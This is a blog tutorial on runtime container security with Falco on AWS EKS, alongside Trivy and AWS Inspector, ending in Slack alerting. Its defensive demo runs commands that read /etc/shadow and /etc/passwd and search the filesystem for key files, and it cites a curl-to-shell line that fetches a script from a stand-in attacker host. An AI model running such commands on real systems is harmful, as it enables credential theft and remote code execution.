Skip to main content

Command Palette

Search for a command to run...

Beyond Shift Left: Runtime Security with Falco on AWS EKS

Updated
9 min read
Beyond Shift Left: Runtime Security with Falco on AWS EKS
A

"Cloud security Engineer ☁️ | Writing about security & cloud topics ✍️ | Let's connect and dive into the exciting world of security and the cloud! ✨"

The whole concept of "Shift Left" revolves around proactive scrutiny, catching issues before they ever reach the environment where real users are. This spans everything from performance and reliability to security, etc. The goal is simple: by the time code hits production, you've already stress-tested it against every failure scenario you can think of.

But for this article, we're narrowing the lens. Because here's what nobody tells you about shifting left from a security perspective: it only covers what you can see before deployment. And production has a way of introducing things you never accounted for.

"Beyond Shift Left" is about what happens after, continuously staying alert to issues that emerge while your workloads are already running and in the environment that actually matters. It's the acknowledgment that security doesn't end when the pipeline goes green. If anything, that's where a whole new category of risk begins, and that is where we get the concept of Runtime Security.

The Experience

It was one of those moments where everything looked fine, until it didn't.

We had Trivy set up in our CI/CD pipeline for our containers running on AWS ECS and EKS. Scans were passing. The .trivyignore file was handling the noisy packages we had consciously decided to suppress. The pipeline was green, the team was confident, and we shipped. For a while, that felt like enough.

A few weeks later, during an audit evaluation. Someone opened AWS Inspector, and the room went quiet. We found many CVEs in the same containers we had already scanned and cleared. The first instinct was familiar: triage, fix, rebuild, get the numbers down. So we did. But somewhere in the middle of that cycle, the multiple team meetings, the version bumps, the cross-team coordination, a question started forming that wasn't going away.

We fixed what the scanners showed us. What about what they couldn't show us? What exactly is running inside these containers?

What is Falco?

With these questions in mind, we decided to implement Falco for our runtime security. Falco is a cloud native runtime security tool that graduated under the Cloud Native Computing Foundation (CNCF).

It works at the kernel level using eBPF to watch every syscall your containers make, every process spawned, every file accessed, every network connection opened. It then matches that behaviour against a set of rules and fires an alert the moment something looks wrong.
It doesn't patch vulnerabilities. It doesn't prevent deployments. What it does is make the invisible visible, and in security, visibility is everything.

Now let's get into the demo, we'll walk through a real setup on AWS EKS, show Trivy and Inspector giving the all-clear, and then watch Falco catch what neither of them could.

The Demo

Prerequisite

Install the needed software, clone the repo here, and check the README file. You should have these versions installed.

  1. Provision the EKS cluster — Terraform setup.
    Run the Terraform commands (within the terraform-conf folder) needed to initialize the EKS cluster.

    The "terraform-conf" sets up the infrastructure needed. It's creating a VPC, subnets, a NAT gateway, the EKS control plane, and a managed node group, OIDC trust between AWS and GitHub, so the pipeline can authenticate to AWS without storing any long-lived keys in GitHub secrets.

    All the infrastructure your cluster needs to run. You should see this after a successful provisioning.

    Note: if you hit an AMI not supported error, check the currently supported EKS versions and update the cluster_version variable accordingly."

  2. Enable AWS Inspector. Go to your AWS Console → search for Inspector → click Enable Inspector.

    Once inside:

    • Make sure Amazon EC2 scanning is enabled

    • Make sure Amazon ECR scanning is enabled

    • Go to Account Management → confirm your account is activated.

  3. Set up your github to use the OIDC temporary role set up previously
    - Go to your GitHub repo → Settings → Secrets and variables → Actions → New repository secret
    Add these three secrets: replace the placeholders with the real value

    Secret Name Value
    AWS_ROLE_ARN "<github_actions_role_arn>"
    AWS_REGION "<your_aws_region>"
    ECR_REPOSITORY "<your_ecr_repo_uri>"
  4. Run the pipeline
    This is automatically triggered on push to main, which:
    a. Builds the Docker image from your Dockerfile
    b. Scans it with Trivy
    c. Pushes it to ECR only if the scan passes
    d. Takes the image from ECR and deploys it to EKS

  5. Monitor the pipeline for any errors and fix them.
    Here, AWS Inspector and Trivy flagged a couple of Critical and High Vulnerabilities.
    Notice Inspector is also flagging vulnerabilities on the EC2 worker node itself, which is the underlying OS that Trivy never scanned at all.

    After they are fixed, you should have a green pipeline and a running deployed pod on a successful run.

At this point, we have been able to detect and address vulnerabilities both pre-deployment with Trivy and post-deployment with AWS Inspector.
But what happens next? What happens inside the container once it is already running? That is the question neither tool was designed to answer, and that is exactly where Falco comes in.

Setting Up Runtime Security with Falco on AWS EKS

Let's install Falco. Run these commands one at a time:

  1. Add the Falco Helm repository
    helm repo add falcosecurity https://falcosecurity.github.io/charts helm repo update

  2. Create a dedicated namespace for Falco
    kubectl create namespace falco

  3. Install Falco via Helm
    helm install falco falcosecurity/falco --namespace falco --set driver.kind=ebpf --set tty=true

  4. Verify Falco is running
    kubectl get pods -n falco

Simulate the attack

Falco is running and watching. Now let's simulate the attack.

  1. start watching Falco logs live:
    kubectl logs -n falco -l app.kubernetes.io/name=falco -f

  2. Open another terminal and exec into the running container
    kubectl exec -it <pod-name> -- /bin/sh

  3. Simulate the attacks by running some attack commands.
    a. Attack 1cat /etc/shadow
    This is the file that stores hashed user passwords on Linux systems. A web server like nginx has absolutely no business reading this file; it serves HTTP traffic, it doesn't need to know about system users or passwords.

    b. Attack 2 — cat /etc/passwd
    Similar to shadow but less sensitive, it stores basic user account information. Still suspicious when a web server reads it. Attackers use it to map out what users exist on the system before escalating privileges.

    c. Attack 3 — curl http://example.com
    This simulates a container making an unexpected outbound connection. nginx receives incoming traffic; it doesn't initiate outbound connections to external domains.
    In a real attack, this would be curl http://attacker-server.com/malware.sh | sh which downloads and executes a malicious script. Falco sees the unexpected outbound connection and alerts regardless of the destination.

    d. Attack 4 — find / -name "*.key" 2>/dev/null
    This searches the entire filesystem for private key files; SSH keys, TLS certificates, and API keys. A classic attacker move after getting into a container is to hunt for credentials that can be used to access other systems or services. The 2>/dev/null part suppresses error messages to keep the search quiet.

The side-by-side terminal screenshot shows how Falco shows the security logs in real-time.

process=cat: a legitimate Linux tool, no malware, no exploit. Just "cat" being used to do something it has no business doing inside a web server.

command=cat /etc/shadow: the exact command the attacker ran. No guesswork, no inference. Falco saw it at the kernel level.

user=root user_uid=0: the container is running as root. This is a separate concern worth fixing; a non-root container limits what an attacker can do even after getting in.

container_image_repository: exactly which image triggered this alert, traceable back to your ECR repository.

k8s_pod_name: exactly which pod, so you know what to kill or isolate immediately.

k8s_ns_name=default: which namespace, useful when you're running multiple workloads across namespaces.

Notice that Falco only alerted on the /etc/shadow read and not all of the attack commands we ran. That is because we are working with Falco's default rules, which cover the most well-known attack patterns out of the box.
For your specific workload, you can write custom rules that target the exact behaviours that should never happen in your containers.

"Falco didn't stop the attacker. But it made sure we knew about it in seconds instead of weeks."

Falco Sidekick

We can integrate the Falco alerts into our existing workflows via Slack, CloudWatch, and PagerDuty. etc. using the Falco Sidekick

Let's set up Falco Sidekick with Slack.

  • Go to slack.comCreate a new workspace → follow the prompts.

  • Now, create the incoming webhook by going to api.slack.com/apps

  • Click Create New AppFrom Scratch

  • Name it Falco Alerts → select your new workspace → Create App

  • On the left sidebar, click Incoming Webhooks

  • Toggle Activate Incoming Webhooks to On

  • Click Add New Webhook to Workspace

  • Select the channel - create a new channel called #falco-alerts and click Allow

  • Copy the webhook URL that appears below.

  • Upgrade your Falco Helm installation with Sidekick enabled:
    helm upgrade falco falcosecurity/falco --namespace falco --set driver.kind=ebpf --set tty=true --set falcosidekick.enabled=true --set falcosidekick.webui.enabled=true --set falcosidekick.config.slack.webhookurl='https://hooks.slack.com/services/your/webhook/url' --set falcosidekick.config.slack.minimumpriority=warning

  • Now, try running the attack command again, and you should see the Slack alerts.

With all of these in place, detection is only the beginning. When Falco fires an alert, your response options can include killing the pod immediately and letting Kubernetes spin up a clean replacement, isolating it with a Network Policy while you investigate, updating your manifest to run as non-root, or making the filesystem read-only if nginx only needs to serve static files.

The right response depends on the severity, but the key point is that you now have the information to respond at all.

Conclusion

A clean image is not a safe container.
Trivy answers: What vulnerable software is present in this image right now?
AWS Inspector answers: What has emerged since deployment?
Falco answers: What is this container actually doing at this very moment?

These are three different questions, and you need all three answers to have a complete picture of your security posture.

Shifting left was the right instinct. But security does not end when the pipeline goes green. It does not end when the inspector gives you a clean report. It continues for as long as your workloads are running, and that is exactly where runtime security lives.

You are not just shifting left anymore. You are going beyond it.